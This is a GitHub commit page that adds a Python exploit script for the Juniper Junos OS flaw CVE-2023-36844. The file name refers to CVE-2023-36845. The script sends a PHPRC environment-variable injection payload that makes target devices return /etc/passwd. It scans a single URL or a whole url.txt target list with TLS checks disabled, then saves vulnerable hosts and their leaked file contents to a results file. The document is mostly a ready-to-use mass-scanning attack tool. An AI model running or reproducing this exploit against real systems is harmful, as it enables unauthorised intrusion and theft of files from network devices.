Skip to content

Commit 32a4af7

Browse files
authored
Add files via upload
Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844
0 parents  commit 32a4af7

File tree

1 file changed

+54
-0
lines changed

1 file changed

+54
-0
lines changed

juniper-cve-2023-36845.py

+54
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
# 作者: VulnExpo
2+
# 日期: 2023-9-22
3+
4+
import requests
5+
import argparse
6+
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
7+
8+
def check_for_vulnerability(url, proxies={}, success_file=None):
9+
headers = {
10+
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
11+
}
12+
payload = 'auto_prepend_file="/etc/passwd"'
13+
try:
14+
response = requests.post(url + "/?PHPRC=/dev/fd/0", headers=headers, data=payload, proxies=proxies, verify=False)
15+
if response.status_code == 200 and "root:" in response.text:
16+
with open(success_file, 'a') as s_file:
17+
s_file.write(f"++++++++++++++++++\n")
18+
s_file.write(f"目标URL: {url}\n")
19+
s_file.write(f"Payload: cat /etc/passwd\n")
20+
s_file.write(f"响应内容:\n{response.text}\n\n")
21+
return True
22+
except Exception as e:
23+
print(f"发生异常:{e}")
24+
return False
25+
26+
def scan_targets(targets, proxies={}, success_file=None):
27+
for target in targets:
28+
target = target.strip()
29+
check_for_vulnerability(target, proxies, success_file)
30+
31+
if __name__ == '__main__':
32+
parser = argparse.ArgumentParser(description="Juniper Networks Junos OS 远程代码执行漏洞 CVE-2023-36844")
33+
parser.add_argument("-u", "--url", help="目标URL")
34+
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
35+
args = parser.parse_args()
36+
37+
if not args.url and not args.file:
38+
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
39+
exit(1)
40+
41+
if args.url:
42+
urls = [args.url]
43+
elif args.file:
44+
with open(args.file, 'r') as file:
45+
urls = file.readlines()
46+
47+
proxies = {}
48+
success_file = 'success_targets.txt'
49+
50+
for url in urls:
51+
url = url.strip()
52+
scan_targets([url], proxies, success_file)
53+
54+
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")

0 commit comments

Comments
 (0)